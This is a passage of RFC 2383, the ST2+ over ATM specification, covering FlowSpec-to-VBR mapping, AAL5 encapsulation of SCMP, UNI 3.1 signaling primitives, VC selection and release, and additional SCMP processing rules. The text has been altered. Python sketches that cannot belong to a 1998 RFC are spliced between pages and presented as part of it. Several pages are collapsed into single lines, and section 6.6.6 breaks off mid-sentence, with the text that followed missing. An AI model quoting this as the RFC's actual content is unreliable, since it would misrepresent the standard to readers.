   ST2+ Data PDU.  That is, the payload in AAL5 CPCS_PDU is mapped to
   the ST2+ Data PDU.

   If the value of STATUS in AAL5_UNITDATA.ind is valid, it is assigned
   to the status in st2p_unitdata.ind.

4.3.3 Value of MTU

   The value of the MTU is the maximum CPCS_SDU size.

5. Protocol Specification of the Management Plane

   The management plane specifies the Null FlowSpec, the Controlled-
   Load Service FlowSpec, and the Guaranteed Service FlowSpec mapping
   rules for UNI 3.1 traffic management.

5.1 Mapping of the Null FlowSpec

   The Null FlowSpec is mapped to the UBR (VBR with the Best Effort
   Indicator).  The value of the PCR (CLP=0+1) is shown in section
   6.7.2.

Suzuki                       Informational                     [Page 21]
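   As an informal illustration of the user plane mapping in section 4.3
   above (not part of this specification), the following Python sketch
   builds the AAL5_UNITDATA.req parameters from an st2p_unitdata.req and
   maps an AAL5_UNITDATA.ind back.  The parameter containers and the CLP
   policy are illustrative only; the choice of CPCS_LP is implementation
   dependent.

      def st2p_to_aal5_req(pri, sid, data, clp_policy=lambda pri: 0):
          # The ST2+ Data PDU (ST header plus ST2+ data, which already
          # carries the SID) is mapped unchanged into the CPCS_SDU payload.
          return {"DATA": data,
                  "CPCS_LP": clp_policy(pri),   # fixed 0/1, or derived from pri
                  "CPCS_UU": 0}                 # CPCS_UU is always set to zero

      def aal5_to_st2p_ind(DATA, CPCS_LP, CPCS_UU, STATUS=None):
          # The CPCS_SDU payload is the ST2+ Data PDU; STATUS is passed on
          # only when the corrupted SDU delivery option is in use.
          ind = {"data": DATA}
          if STATUS is not None:
              ind["status"] = STATUS
          return ind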
RFC 2383 ST2+ over ATM August 1998 5.2 Mapping of the Controlled-Load Service FlowSpec The Controlled-Load FlowSpec is mapped to the VBR whose PCR (CLP=0+1), SCR (CLP=0+1), and MBS (CLP=0+1) are specified. The value of the PCR (CLP=0+1) is shown in section 6.7.2. Let scr be the calculated value of the SCR (CLP=0+1). Based on the value of the [r] field in the Controlled-Load FlowSpec, it is given by: scr = ([r] / 48) * S, where S is the coefficient of segmentation, and in an implementation, it must be configurable to any value between 1.0 and 56.0. The recommended default value is 1.2. The value of the SCR (CLP=0+1) is a minimum integer equal to or more than the calculated value of the scr. Let mbs be the calculated value of the MBS (CLP=0+1). Based on the value of the [b] field in the Controlled-Load FlowSpec, it is given by: mbs = ([b] / 48) * S. The value of the MBS (CLP=0+1) is a minimum integer equal to or more than the calculated value of the mbs. The values of the [p] and [m] fields in the Controlled-Load FlowSpec are ignored. 5.3 Mapping of the Guaranteed Service FlowSpec Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support Guaranteed Services. It will be supported by the UNI 3.1/4.0 version. 6. Protocol Specification of the Control Plane This section specifies the rules for encapsulating the ST2+ SCMP PDU into the AAL5 PDU, the relationship between ST2+ SCMP and PVC management for ST2+ data, and the protocol interaction between ST2+ SCMP and UNI 3.1 signaling. 6.1 AAL5 Encapsulation for ST2+ SCMP PDU This subsection describes AAL5 PDU encapsulation for the ST2+ SCMP PDU. ST2+ Data PDU compatible encapsulation, AAL5 encapsulation based on RFC 1483, and on the RFC 1483 extension are specified. Selection of which one to use depends on the implementation. Suzuki Informational [Page 22]
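   As a worked example of the Controlled-Load mapping in section 5.2
   above (not part of this specification), the following Python sketch
   computes the SCR (CLP=0+1) and MBS (CLP=0+1) values from the [r] and
   [b] FlowSpec fields, rounding each result up to the next integer.
   The function name is an illustrative assumption; [r] and [b] are in
   bytes per second and bytes, the results in cells per second and
   cells.

      import math

      def vbr_parameters(r, b, S=1.2):
          # S is the coefficient of segmentation; it must be configurable
          # between 1.0 and 56.0, with a recommended default of 1.2.
          if not 1.0 <= S <= 56.0:
              raise ValueError("S must be between 1.0 and 56.0")
          scr = math.ceil((r / 48.0) * S)   # SCR (CLP=0+1)
          mbs = math.ceil((b / 48.0) * S)   # MBS (CLP=0+1)
          return scr, mbs

   For example, [r] = 1,500,000 bytes/s and [b] = 65,535 bytes with the
   default S give SCR = 37,500 cells/s and MBS = 1639 cells.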
RFC 2383                    ST2+ over ATM                    August 1998

   The ST2+ over ATM protocol does not cover a VC (SVC/PVC) that
   transfers ST2+ SCMP.  VCs for IPv4 transfer may be used for ST2+
   SCMP transfer, and implementations may provide particular VCs for
   ST2+ SCMP transfer.  Selection of these VCs depends on the
   implementation.

6.1.1 ST2+ Data PDU compatible encapsulation

   The ST2+ Data PDU compatible encapsulation is shown in Fig. 6.1: the
   ST2+ SCMP PDU is mapped to the payload of AAL5 CPCS_PDU.
   Implementors should note that this encapsulation is not applicable
   when the ST2+ SCMP PDU is multiplexed with other protocols.

      +-------+---------------------------+
      | ST    |         ST2+ SCMP         |  ST2+
      | header|                           |  SCMP PDU
      +-------+---------------------------+
      :                                   :
      :                                   :
   +-----------------------------------+---+--------+
   |             CPCS_PDU              |PAD|CPCS_PDU|  AAL5
   |             payload               |   |trailer |  CPCS_PDU
   +-----------------------------------+---+--------+

         Fig. 6.1: ST2+ Data PDU compatible encapsulation.

6.1.2 RFC 1483 base encapsulation

   The RFC 1483 base encapsulation is shown in Fig. 6.2: the ST2+ SCMP
   PDU with the RFC 1483 LLC encapsulation for routed protocol format
   is mapped to the payload in AAL5 CPCS_PDU.

      +------+----------------+
      |  ST  |   ST2+ SCMP    |  ST2+
      |header|                |  SCMP PDU
      +------+----------------+
      :                       :
   +---+---+---+-----------------------+
   |LLC|OUI|PID|      Information      |  IEEE 802 SNAP
   |   |   |   |                       |  ISO 8802-2 LLC
   +---+---+---+-----------------------+
   :                                   :
   +-----------------------------------+---+--------+
   |             CPCS_PDU              |PAD|CPCS_PDU|  AAL5
   |             payload               |   |trailer |  CPCS_PDU
   +-----------------------------------+---+--------+

              Fig. 6.2: RFC 1483 base encapsulation.

Suzuki                       Informational                     [Page 23]
RFC 2383                    ST2+ over ATM                    August 1998

   The value of the LLC is 0xAA-AA-03, the value of the OUI is
   0x00-00-00, and the value of the PID is 0x08-00.

   IPv4 and ST2+ SCMP PDUs are distinguished by the IP version number,
   which is located in the first four bits of the IPv4 or ST headers.

6.1.3 RFC 1483 extension base encapsulation

   The RFC 1483 extension base encapsulation is the same as for RFC
   1483 base encapsulation, except that the value of the OUI is
   0x00-00-5E (IANA) and the value of the PID is 0xXX-XX (TBD).

   The RFC 1483 base encapsulation for the SCMP is ideal, but requires
   modifying the IPv4 processing in the driver software of the WS or
   PC.  Therefore, the RFC 1483 base encapsulation may be difficult to
   implement.  This encapsulation is designed to solve this problem.

6.2 Service Primitives Provided by Control Plane

   RFC 1819 ST2+ does not specify SCMP state machines, and the ST2+
   over ATM protocol does not define SCMP state machines either.
   Therefore, the control plane specification assumes the following.

   o The ST2+ agent has ST2+ SCMP layer entities that correspond to the
     next hops and the previous hop in the stream.

   o The SCMP layer entity terminates ACK, ERROR, and timeout
     processing and provides reliable SCMP delivery.

   o The origin consists of an upper layer entity, ST2+ SCMP layer
     entities for next hops, and a routing machine that delivers SCMP
     messages between these entities.

   o The intermediate agent consists of ST2+ SCMP layer entities for a
     previous hop and for next hops and a routing machine that delivers
     SCMP messages between these entities.

   o The target consists of an upper layer entity, an ST2+ SCMP layer
     entity for a previous hop, and a routing machine that delivers
     SCMP messages between these entities.

   At least, the ST2+ SCMP layer entity for the next hop provides the
   following services to the routing machine.

   o connect.req
     This primitive sends a request for a CONNECT message transfer to
     the ST2+ SCMP layer entity.

Suzuki                       Informational                     [Page 24]
RFC 2383 ST2+ over ATM August 1998 o change.req This primitive sends a request for a CHANGE message transfer to the ST2+ SCMP layer entity. o accept.ind This primitive indicates an ACCEPT message delivery from the ST2+ SCMP layer entity. o disconnect.req This primitive sends a request for a DISCONNECT message transfer to the ST2+ SCMP layer entity. o refuse.ind This primitive indicates a REFUSE message delivery from the ST2+ SCMP layer entity, or indicates detection of an abnormal status such as an illegal message or timeout in the ST2+ SCMP layer entity. At least, the ST2+ SCMP layer entity for the previous hop provides the following services to the routing machine. o connect.ind This primitive indicates a CONNECT message delivery from the ST2+ SCMP layer entity. o change.ind This primitive indicates a CHANGE message delivery from the ST2+ SCMP layer entity. o accept.req This primitive sends a request for an ACCEPT message transfer to the ST2+ SCMP layer entity. o disconnect.ind This primitive indicates a DISCONNECT message delivery from the ST2+ SCMP layer entity, or indicates detection of an abnormal status such as an illegal message or timeout in the ST2+ SCMP layer entity. o refuse.req This primitive sends a request for a REFUSE message transfer to the ST2+ SCMP layer entity. 6.3 Service Primitives Provided by UNI 3.1 Signaling The UNI 3.1 signaling layer entity on the ST2+ over ATM control plane provides the following services to the ST2+ SCMP layer entity. The ST2+ over ATM protocol does not specify the UNI 3.1 signaling state Suzuki Informational [Page 25]
RFC 2383 ST2+ over ATM August 1998 machines. These are defined in [10, 12, 13]. o setup.req This primitive sends a request for a SETUP message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. The ST2+ SCMP layer entity that sent this primitive receives an acknowledgment. If the setup succeeds the acknowledgment is a setup.conf primitive and if the setup fails it is a release.ind or release.conf primitive. o setup.conf This primitive indicates a CONNECT message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. o setup.ind This primitive indicates a SETUP message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. The ST2+ SCMP layer entity that received this primitive sends an acknowledgment. If the setup is accepted the acknowledgment is a setup.resp primitive and if the setup is rejected it is a release.resp primitive if the state of the UNI 3.1 signaling layer entity is U6; otherwise it is a release.req primitive. o setup.resp This primitive sends a request for a CONNECT message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. The ST2+ SCMP layer entity that sent this primitive receives an acknowledgment. If the setup is completed the acknowledgment is a setup-complete.ind primitive and if the setup fails it is a release.ind or release.conf primitive. o setup-complete.ind This primitive indicates a CONNECT ACKNOWLEDGE message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. o release.req This primitive sends a request for a RELEASE message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. The ST2+ SCMP layer entity that sent this primitive receives an acknowledgment that is a release.conf primitive. o release.conf This primitive indicates a RELEASE COMPLETE message delivery, or indicates a RELEASE message delivery when the status of the UNI 3.1 signaling layer entity is U11, or indicates detection of an abnormal status such as an illegal message or timeout in the UNI 3.1 signaling layer entity, from the UNI 3.1 signaling layer entity Suzuki Informational [Page 26]
RFC 2383                    ST2+ over ATM                    August 1998

   to the ST2+ SCMP layer entity.

   o release.ind
     This primitive indicates a RELEASE message delivery from the UNI
     3.1 signaling layer entity to the ST2+ SCMP layer entity when the
     status of the UNI 3.1 signaling layer entity is other than U11.
     The ST2+ SCMP layer entity that received this primitive sends an
     acknowledgment that is a release.resp primitive.  And this
     primitive also indicates detection of an abnormal status such as
     an illegal message or timeout in the UNI 3.1 signaling layer
     entity and then a REFUSE message is transferred.  In this case,
     the ST2+ SCMP layer entity that received this primitive receives a
     release.conf primitive in succession.

   o release.resp
     This primitive sends a request for a RELEASE COMPLETE message
     transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling
     layer entity.

   o add-party.req
     This primitive sends a request for an ADD PARTY message transfer
     from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer
     entity.  The ST2+ SCMP layer entity that sent this primitive
     receives an acknowledgment.  If the setup succeeds the
     acknowledgment is an add-party.conf primitive and if the setup
     fails it is a drop-party.conf primitive.

   o add-party.conf
     This primitive indicates an ADD PARTY ACKNOWLEDGE message delivery
     from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer
     entity.

   o drop-party.req
     This primitive sends a request for a DROP PARTY message transfer
     from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer
     entity.  The ST2+ SCMP layer entity that sent this primitive
     receives an acknowledgment that is a drop-party.conf primitive.

   o drop-party.conf
     This primitive indicates an ADD PARTY REJECT message delivery, or
     indicates a DROP PARTY ACKNOWLEDGE message delivery, or indicates
     detection of an abnormal status such as an illegal message or
     timeout in the UNI 3.1 signaling layer entity, from the UNI 3.1
     signaling layer entity to the ST2+ SCMP layer entity.

   o drop-party.ind
     This primitive indicates a DROP PARTY message delivery from the
     UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity.  The
     ST2+ SCMP layer entity that received this primitive sends an
     acknowledgment that is a drop-party.resp primitive.

Suzuki                       Informational                     [Page 27]
RFC 2383                    ST2+ over ATM                    August 1998

   o drop-party.resp
     This primitive sends a request for a DROP PARTY ACKNOWLEDGE
     message transfer from the ST2+ SCMP layer entity to the UNI 3.1
     signaling layer entity.

6.4 VC Style Selection Criteria

   The ST2+ over ATM protocol supports PVC, the reverse channel of bi-
   directional SVC, point-to-point SVC, and point-to-multipoint SVC for
   ST2+ Data PDU transfer.  And SVC supports both upstream and
   downstream call initiation styles.

   A 32-bit PVC identifier that is unique between neighboring ST2+
   agents is assigned to each PVC.  And the reverse channel of the bi-
   directional point-to-point SVC used by the existing stream is
   identified by the SID of the stream that occupies the forward
   channel.

   When the ST2+ agent sets up a stream or changes QoS, the ST2+ agent
   must select one VC style from these SVC and PVC styles as a hop that
   is part of the stream.

   In the ST2+ over ATM protocol, VC style selection criteria depend on
   the implementation.  This subsection describes examples of VC style
   selection criteria for the ST2+ over ATM protocol as a reference for
   implementors.  Note that the following descriptions in this
   subsection are not part of the ST2+ over ATM protocol specification.

6.4.1 Examples of PVC selection criteria

   At least, the ST2+ agent may have to manage the following
   information for each PVC that can be used by ST2+ Data PDU transfer.

   o PVC identifier

   o ATM interface identifier in the ST2+ agent

   o VPI/VCI

   o State of VC: e.g. enabled or disabled, occupied or vacant

   o QoS of VC

   o Nexthop IP address

Suzuki                       Informational                     [Page 28]
RFC 2383                    ST2+ over ATM                    August 1998

   When a PVC is selected for a hop of a stream, at least the following
   confirmations may be needed: that the state of the PVC is vacant,
   and that the next hop IP address and QoS are consistent with the
   requirements of the stream.

   It is also feasible to introduce access lists to each PVC and to
   consider the access lists in the selection process.  Examples of an
   access list are shown in the following.

   o Permit or deny use by a stream whose previous hop is specified.

   o Permit or deny use by a stream whose origin is specified.

   o Permit or deny use by a stream whose SID is specified.

   o Permit or deny use by a stream whose target is specified.

   o Permit or deny use by a stream whose target and SAP are specified.

   o Any combination of the above.

6.4.2 Examples of reverse channel of bi-directional SVC selection
      criteria

   At least, the ST2+ agent may have to manage the following
   information for each reverse channel of bi-directional SVCs.

   o SID of the stream that occupies the forward channel

   o ATM interface identifier in the ST2+ agent

   o VPI/VCI

   o State of the reverse channel in the VC: e.g. enabled or disabled,
     occupied or vacant

   o QoS of VC

   o Nexthop IP address

   When a reverse channel of the bi-directional point-to-point SVC used
   by the existing stream is selected for a hop of a stream, at least
   the following confirmations may be needed: that the state of the
   channel is vacant, and that the next hop IP address and QoS are
   consistent with the requirements of the stream.

Suzuki                       Informational                     [Page 29]
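   In the same informal spirit as the examples above (not part of the
   protocol specification), the following Python sketch shows one
   possible PVC selection check: a PVC is usable for a hop when it is
   enabled and vacant, leads to the required next hop, and offers
   sufficient QoS.  The data structure, field names, and the qos_ok
   predicate are illustrative assumptions.

      from dataclasses import dataclass

      @dataclass
      class PvcEntry:
          pvc_id: int          # 32-bit PVC identifier
          interface: str       # ATM interface identifier in the agent
          vpi_vci: tuple       # (VPI, VCI)
          enabled: bool        # state of VC: enabled or disabled
          occupied: bool       # state of VC: occupied or vacant
          qos: dict            # QoS of VC
          next_hop_ip: str     # next hop IP address

      def select_pvc(pvc_table, next_hop_ip, required_qos, qos_ok):
          # Access-list checks (previous hop, origin, SID, target, ...)
          # could be added to this loop as well.
          for pvc in pvc_table:
              if (pvc.enabled and not pvc.occupied
                      and pvc.next_hop_ip == next_hop_ip
                      and qos_ok(pvc.qos, required_qos)):
                  return pvc
          return None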
RFC 2383                    ST2+ over ATM                    August 1998

   It is also feasible to introduce selection rules to the ST2+ agent.
   Examples of selection rules are shown in the following.

   o Permit reuse of the reverse channel by a stream whose origin is
     one of the targets in the stream that occupies the forward
     channel.

   o Permit reuse of the reverse channel by a stream one of whose
     targets is the origin in the stream that occupies the forward
     channel.

   o Permit reuse of the reverse channel by a stream whose previous hop
     is one of the next hops in the stream that occupies the forward
     channel.

   o Any combination of the above.

6.4.3 Examples of SVC selection criteria

   When an SVC is used for a hop of a stream, at first, the ST2+ agent
   must select point-to-point or point-to-multipoint SVC.  Examples of
   this selection rule are shown in the following.

   o If the network supports only point-to-point SVC, select it.

   o If the network supports point-to-multipoint SVC, select it.

   If point-to-point SVC is selected, the ST2+ agent must select
   upstream or downstream call initiation style.  Examples of this
   selection rule are shown in the following.

   o A VC for a stream whose previous hop is specified is initiated
     from upstream or downstream.

   o A VC for a stream whose next hop is specified is initiated from
     upstream or downstream.

   o A VC for a stream whose origin is specified is initiated from
     upstream or downstream.

   o A VC for a stream whose SID is specified is initiated from
     upstream or downstream.

   o A VC for a stream whose target is specified is initiated from
     upstream or downstream.

   o A VC for a stream whose target and SAP are specified is initiated
     from upstream or downstream.

Suzuki                       Informational                     [Page 30]
RFC 2383 ST2+ over ATM August 1998 o Any combination of the above. 6.5 VC Management This subsection specifies VC management in the ST2+ over ATM protocol. 6.5.1 Outgoing call processing of SVC When outgoing call processing of the first leaf of a point-to- multipoint SVC or a point-to-point SVC is required inside the ST2+ SCMP layer entity, a setup.req primitive is sent to the UNI 3.1 signaling layer entity. If the UNI 3.1 signaling layer entity responds with a setup.conf primitive, the call processing is assumed to have succeeded. If the UNI 3.1 signaling layer entity responds with anything other than this primitive, the processing rule is the same as the SVC disconnect processing that is shown in section 6.5.4 and the outgoing call processing is assumed to have failed. When outgoing call processing of a later leaf of a point-to- multipoint SVC is required, an add-party.req primitive is sent to the UNI 3.1 signaling layer entity. If the UNI 3.1 signaling layer entity responds with an add-party.conf primitive, the call processing is assumed to have succeeded. If the UNI 3.1 signaling layer entity responds with anything other than this primitive, the processing rule is the same as the SVC disconnect processing that is shown in section 6.5.4 and the outgoing call processing is assumed to have failed. 6.5.2 Incoming call processing of SVC When an incoming call processing of SVC is required inside the ST2+ SCMP layer entity, it sets a watchdog timer. The time interval of the timer depends on the implementation. The ST2+ SCMP layer entity waits for a setup.ind primitive indication from the UNI 3.1 signaling layer entity. When this primitive is indicated and the parameters in it are acceptable, the ST2+ SCMP layer entity responds with a setup.resp primitive. If the parameters are not acceptable, the ST2+ SCMP layer entity stops the timer, and if the state of the UNI 3.1 signaling layer entity is U6, the entity responds with a release.resp primitive, and if the state is other than this, the entity responds with a release.req primitive, and then waits for a release.conf primitive response and the incoming call processing is assumed to have failed. If the ST2+ SCMP layer entity responds with a setup.resp primitive, then the entity waits for the next primitive indication, and when the next primitive is indicated, the ST2+ SCMP layer entity stops the Suzuki Informational [Page 31]
RFC 2383 ST2+ over ATM August 1998 timer. If a setup-complete.ind primitive is indicated, the incoming call processing is assumed to have succeeded. If the UNI 3.1 signaling layer entity responds with anything other than this primitive or if the timer expires, the processing rule is the same as the SVC disconnect processing that is shown in section 6.5.4 and the incoming call processing is assumed to have failed. 6.5.3 VC release processing inside ST2+ SCMP layer When a VC release is required inside an ST2+ SCMP layer entity, if the previous hop or next hop is connected with a PVC, the PVC state is set to vacant and the VC release processing is assumed to be completed. If the previous hop or next hop is connected with a point-to-point SVC whose reverse channel is occupied, the state of the channel in the VC is set to vacant, the SID information of the VC is updated, and the VC release processing is assumed to be completed. If the previous hop or next hop is connected with a point-to-point SVC whose reverse channel is vacant, if the previous hop is connected with a point-to-multipoint SVC, or if the next hop is connected with a point-to-multipoint SVC and the number of leaves is 1, then the ST2+ SCMP layer entity sends a release.req primitive to the UNI 3.1 signaling layer entity, then waits for a release.conf primitive indication; when one is indicated, the VC release processing is assumed to be completed. If the next hop is connected with a point-to-multipoint SVC and the number of leaves is other than 1, the ST2+ SCMP layer entity sends a drop-party.req primitive to the UNI 3.1 signaling layer entity, then waits for a drop-party.conf primitive indication; when one is indicated, the VC release processing is assumed to be completed. 6.5.4 VC disconnect processing from UNI 3.1 signaling layer If an ST2+ SCMP layer entity corresponds to a UNI 3.1 signaling layer entity, and if the ST2+ SCMP layer entity is sent a release.ind primitive from the UNI 3.1 signaling layer entity, whose cause is a delivery of a RELEASE message, the ST2+ SCMP layer entity responds with a release.resp primitive, and then the VC disconnect processing is assumed to be completed. If the ST2+ SCMP layer entity is sent a release.ind primitive, whose cause is other than the previous case, the ST2+ SCMP layer entity waits for a release.conf primitive response. When a release.conf primitive is indicated, the VC disconnect processing is assumed to be completed. Suzuki Informational [Page 32]
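   As an informal summary of the VC release decision in section 6.5.3
   above (not part of this specification), the following Python sketch
   shows the branch taken for each way a hop can be connected.  The
   object attributes and the method names on the signaling handle are
   illustrative renderings of the release.req and drop-party.req
   primitives; the name "uni" stands for the UNI 3.1 signaling layer
   entity.

      def release_vc(vc, uni):
          if vc.kind == "pvc":
              vc.occupied = False            # PVC state is set to vacant
          elif vc.kind == "reverse-channel":
              vc.reverse_occupied = False    # reverse channel becomes vacant
              vc.reverse_sid = None          # and its SID information updated
          elif vc.kind == "p2mp-next-hop" and vc.leaves > 1:
              uni.drop_party_req(vc)         # drop one leaf, keep the SVC
          else:
              uni.release_req(vc)            # point-to-point SVC with a vacant
                                             # reverse channel, previous-hop
                                             # p2mp SVC, or last leaf of a
                                             # next-hop p2mp SVC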
RFC 2383                    ST2+ over ATM                    August 1998

   Note that if next hops from ST2+ SCMP layer entities are connected
   with a point-to-multipoint SVC, the ST2+ SCMP layer entities to next
   hops correspond to a UNI 3.1 signaling layer entity.  In this case,
   if the ST2+ SCMP layer entities are sent release.ind primitives from
   the UNI 3.1 signaling layer entity, whose cause is the delivery of a
   RELEASE message, one of the ST2+ SCMP layer entities responds with a
   release.resp primitive, and then the VC disconnect processing in the
   entities that are sent release.ind primitives is assumed to be
   completed.  If the ST2+ SCMP layer entities are sent release.ind
   primitives, whose cause is other than the previous case, the ST2+
   SCMP layer entities wait for release.conf primitive responses.  When
   release.conf primitives are indicated, the VC disconnect processing
   in the entities that are indicated release.ind primitives is assumed
   to be completed.

   If the ST2+ SCMP layer entity is sent a drop-party.ind primitive
   from the UNI 3.1 signaling layer entity, the ST2+ SCMP layer entity
   responds with a drop-party.resp primitive, and then the VC
   disconnect processing is assumed to be completed.  If the ST2+ SCMP
   layer entity is sent a drop-party.conf primitive, the VC disconnect
   processing is assumed to be completed.

6.6 Additional SCMP Processing Rules

   This subsection specifies processing rules that are additional to
   the SCMP processing rules defined in the RFC 1819 ST2+ protocol
   specification.  The following additional rules are applied when the
   previous hop or next hop is connected with an ATM connection in the
   ST2+ SCMP layer entity.

6.6.1 Additional connect.req processing rules

   When a connect.req primitive is sent to the ST2+ SCMP layer entity
   for the next hop, the entity confirms whether or not the VC for the
   next hop exists.  If it does, the entity forwards a CONNECT message
   that does not include a VC-type common SCMP element to the next hop.

   If it does not, the entity selects a VC style.  If the result is a
   PVC or a reverse channel of a bi-directional point-to-point SVC used
   by an existing stream, the VC state is set to occupied.  The entity
   forwards a CONNECT message with a VC-type common SCMP element that
   reflects the result of the selection to the next hop.

6.6.2 Additional connect.ind processing rules

   The ST2+ SCMP layer entity for the previous hop confirms whether or
   not the CONNECT message includes a VC-type common SCMP element.

Suzuki                       Informational                     [Page 33]
RFC 2383 ST2+ over ATM August 1998 If a VC-type common SCMP element is not included and the VC for the next hop exists, a connect.ind primitive is sent to the routing machine. If the VC for the next hop does not exist, a REFUSE message is forwarded to the previous hop. If a VC-type common SCMP element is included and a point-to-point SVC, whose calling party is the upstream or downstream, or a point- to-multipoint SVC is specified, a connect.ind primitive is sent to the routing machine. If a PVC or a reverse channel of a bi- directional point-to-point SVC used by an existing stream is specified and the specified VC exists, the VC state is set to occupied and a connect.ind primitive is sent to the routing machine. Otherwise, a REFUSE message is forwarded to the previous hop. 6.6.3 Additional change.req processing rules When a change.req primitive is sent to the ST2+ SCMP layer entity for the next hop, the entity releases the VC whose process is shown in section 6.5.3. Then, the entity selects a VC style. If the result is a PVC or a reverse channel of a bi-directional point-to-point SVC used by an existing stream, the VC state is set to occupied. The entity forwards a CHANGE message with a VC-type common SCMP element that reflects the result of the selection to the next hop. 6.6.4 Additional change.ind processing rules The ST2+ SCMP layer entity for the previous hop confirms whether the CHANGE message includes a VC-type common SCMP element. If a VC-type common SCMP element is not included, a REFUSE message is forwarded to the previous hop. If a VC-type common SCMP element is included, the entity releases the VC whose process is shown in section 6.5.3. If the element specifies a point-to-point SVC, whose calling party is the upstream or downstream, or a point-to-multipoint SVC, a change.ind primitive is sent to the routing machine. If a PVC or a reverse channel of a bi- directional point-to-point SVC used by an existing stream is specified and the specified VC exists, the VC state is set to occupied and a change.ind primitive is sent to the routing machine. Otherwise, a REFUSE message is forwarded to the previous hop. 6.6.5 Additional accept.req processing rules When an accept.req primitive is sent to the ST2+ SCMP layer entity for the previous hop, the entity confirms the state of the UNI 3.1 signaling layer entity. If the state of the entity is other than U0 Suzuki Informational [Page 34]
RFC 2383 ST2+ over ATM August 1998 or U10, the accept.req primitive is queued and is processed after the state changes to U0 or U10. If the state of the entity is U0 or U10, the ST2+ SCMP layer entity confirms whether or not the VC for the previous hop exists. If it does, an ACCEPT message is forwarded to the previous hop. If it does not and the CONNECT or CHANGE message that corresponds to the accept.req primitive specified a point-to-point SVC whose calling party is the upstream or a point-to-multipoint SVC, then the entity processes an incoming call that is shown in section 6.5.2. If the incoming call processing succeeds, an ACCEPT message is forwarded to the previous hop. If the CONNECT or CHANGE message that corresponds to the accept.req primitive specified a point-to-point SVC whose calling party is downstream, the entity converts from the IP address of the previous hop to the ATM address, and then the entity processes an outgoing call that is shown in section 6.5.1. If the outgoing call processing succeeds, an ACCEPT message is forwarded to the previous hop. For cases other than those described above or if the incoming or outgoing call processing fails, a REFUSE message is forwarded to the previous hop and a disconnect.ind primitive is sent to the routing machine. 6.6.6 Additional accept.ind processing rules When an ACCEPT message is processed in the ST2+ SCMP layer entity for the next hop, the entity confirms the state of the UNI 3.1 signaling layer entity. If the state of the entity is other than U0 or U10, the ACCEPT message is queued and is processed after the state changes to U0 or U10. If the state of the entity is U0 or U10, the ST2+ SCMP layer entity confirms whether or not the VC for the next hop exists. If it does, an accept.ind primitive is sent to the routing machine. If it does not and the CONNECT or CHANGE message that corresponds to the ACCEPT message specified a point-to-point SVC whose calling party is the upstream or a point-to-multipoint SVC, then the entity converts from the IP address of the next hop to the ATM address, and then the entity processes an outgoing call that is shown in section 6.5.1. If the outgoing call processing succeeds, an accept.ind primitive is sent to the routing machine. If the CONNECT or CHANGE message that corresponds to the ACCEPT message specified a point-to- point SVC whose calling party is downstream, the entity processes an incoming call that is shown in section 6.5.2. If the incoming call processing succeeds, an accept.ind primitive is sent to the routing machine. For cases other than those described above or if the incoming or outgoing call processing fails, a refuse.ind primitive is Suzuki Informational [Page 35]
RFC 2383                    ST2+ over ATM                    August 1998

6.6.7 Additional disconnect.req processing rules

   At first, the ST2+ SCMP layer entity for the next hop forwards a
   DISCONNECT message to the next hop.  And then, after the
   disconnect.req processing, if there are no more targets that are
   connected downstream of the entity and the entity is not waiting for
   an ACCEPT or REFUSE message response from targets, the entity
   releases the VC whose process is shown in section 6.5.3.

6.6.8 Additional disconnect.ind processing rules

   At first, after the disconnect.ind processing, if there are no more
   targets that are connected downstream of the ST2+ SCMP layer entity
   for the previous hop and the entity is not waiting for an ACCEPT or
   REFUSE message response from targets, the entity releases the VC
   whose process is shown in section 6.5.3.  And then, the entity sends
   a disconnect.ind primitive to the routing machine.

6.6.9 Additional refuse.req processing rules

   At first, the ST2+ SCMP layer entity for the previous hop forwards a
   REFUSE message to the previous hop.  And then, after the refuse.req
   processing, if there are no more targets that are connected
   downstream of the entity and the entity is not waiting for an ACCEPT
   or REFUSE message response from targets, the entity releases the VC
   whose process is shown in section 6.5.3.

6.6.10 Additional refuse.ind processing rules

   At first, after the refuse.ind processing, if there are no more
   targets that are connected downstream of the ST2+ SCMP layer entity
   for the next hop and the entity is not waiting for an ACCEPT or
   REFUSE message response from targets, the entity releases the VC
   whose process is shown in section 6.5.3.  And then, the entity sends
   a refuse.ind primitive to the routing machine.

Suzuki                       Informational                     [Page 36]
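   The release condition shared by sections 6.6.7 through 6.6.10 above
   can be summarized by the following Python sketch (not part of this
   specification; the attribute names are illustrative): the VC is
   released through the process of section 6.5.3 only when no targets
   remain connected downstream of the entity and no ACCEPT or REFUSE
   response is still awaited.

      def maybe_release_vc(entity):
          if (not entity.downstream_targets
                  and not entity.awaiting_accept_or_refuse):
              entity.release_vc()   # the per-VC-style release of section 6.5.3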
RFC 2383                    ST2+ over ATM                    August 1998

6.6.11 SVC disconnect processing

   When the SVC disconnect processing of section 6.5.4 is applied to
   the ST2+ SCMP layer entity for the previous hop from the UNI 3.1
   signaling layer entity and the SVC disconnect processing is
   completed, the entity forwards a REFUSE message to the previous hop
   and sends a disconnect.ind primitive to the routing machine.

   When the SVC disconnect processing of section 6.5.4 is applied to
   the ST2+ SCMP layer entity for the next hop from the UNI 3.1
   signaling layer entity and the SVC disconnect processing is
   completed, the entity sends a refuse.ind primitive to the routing
   machine and forwards a DISCONNECT message to the next hop.

6.7 UNI 3.1 Signaling Information Element Coding Rules

   The ST2+ over ATM protocol does not specify the coding rules needed
   for the following information elements in UNI 3.1 signaling.  The
   usages of these information elements are specified in [10].

   o Protocol discriminator

   o Call reference

   o Message type

   o Message length

   o Call state

   o Called party number

   o Called party subaddress

   o Calling party number

   o Calling party subaddress

   o Cause

   o Connection identifier

   o Broadband repeat indicator

   o Restart indicator

   o Broadband sending complete

Suzuki                       Informational                     [Page 37]
